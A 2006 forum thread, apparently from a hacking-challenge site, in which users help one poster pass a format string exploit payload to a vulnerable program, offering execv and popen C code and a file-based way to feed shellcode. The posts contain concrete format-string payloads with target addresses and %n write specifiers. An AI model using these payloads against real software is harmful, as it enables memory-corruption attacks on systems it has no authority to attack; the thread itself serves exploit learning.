HomepageOther stuffLinux Console| Author | Post | |||
theblacksheep       |
Nothing sucks as much as all that escaping when using strings. I am working on a format string exploit and I have everything except a programm that can output the string. That is what I have to execute somehow: ./programm `perl -e 'print "\\x80\\x96\\x04\\x08\\x82\\x96\\x04\\x08%.65493u%8\\$n%.49186u%9\\$n"'` How would launch this? (I need the env variables). It is all confusing. The popen thing didn't work. int file_desc = popen("perl -e 'print \"\\x80\\x96\\x04\\x08\\x82\\x96\\x04\\x08%.65493u%8\\$n%.49186u%9\\$n\"'", "r"); read(file_desc, buf, 100); pclose(file_desc); execve("./programm", "programm", buf, NULL, env); The output I get doing this are just random chars. No idea why. Any other ideas? tbs |
|||
 27.03.2006 20:52:35 |
|
|||
belo     |
#include <stdio.h>
int
main(void)
{
char *argv[] = {"programm"
"\x80\x96\x04\x08\x82\x96\x04\x08%.65493u%8\\$n%.49186u%9\\$n",
NULL};
execv("./programm", argv);
}
You don't need a double '\' if you want to speficify and hexa number, but you need to use '\\' if you actually want to print '\'. Dont forget to change the first element of argv (the name of the program) if you try this one. |
|||
Edited by belo on 27.03.2006 22:24:21 | ||||
| 27.03.2006 22:07:44 |
|
|||
mxn |
 Quote:execve("./programm", "programm", buf, NULL, env); I wonder how that worked for you, as its parameters are (char*,char**,char**), so you cant directly put the arguments into the fucntion call |
|||
|
28.03.2006 14:50:40 |
|
|||
|
theblacksheep |
@mxn: Sorry it should have been "execle". |
|||
|
28.03.2006 16:58:20 |
|
|||
|
theblacksheep |
@belo thx for the popen idea! It worked like this: ... int file_desc = popen("perl -e 'print \"\x34\x96\x04\x08\x36\x96\x04\x08%.65452u%8\\$n%.49227u%9\\$n\"'", "r"); fgets( buf, sizeof buf, file_desc); pclose(file_desc); |
|||
|
28.03.2006 17:28:33 |
|
|||
|
belo |
Glad it worked out in the end  |
|||
| 28.03.2006 21:22:26 |
|
|||
|
sebasjm |
Hi! There is another way, just write in a file all the characters you want to pass. For example: <file1> Hi! I'm a shellcode in the file1 </file1> Ant then, start the program like this ./program `cat file1` And everything that is in the file will be the first arg. And you can use a hex editor or something else to edit your file, like: echo -e "\x6c\x69\x6e\x75\x78\x20\x72\x75\x6c\x65\x7a" PD: The way to copy and paste in a terminal depends on the terminal you are using (Konsole, gnome-terminal, xterm.... ) Bye. |
|||
 07.04.2006 16:35:18 |
|
|||
private message
EMail
Website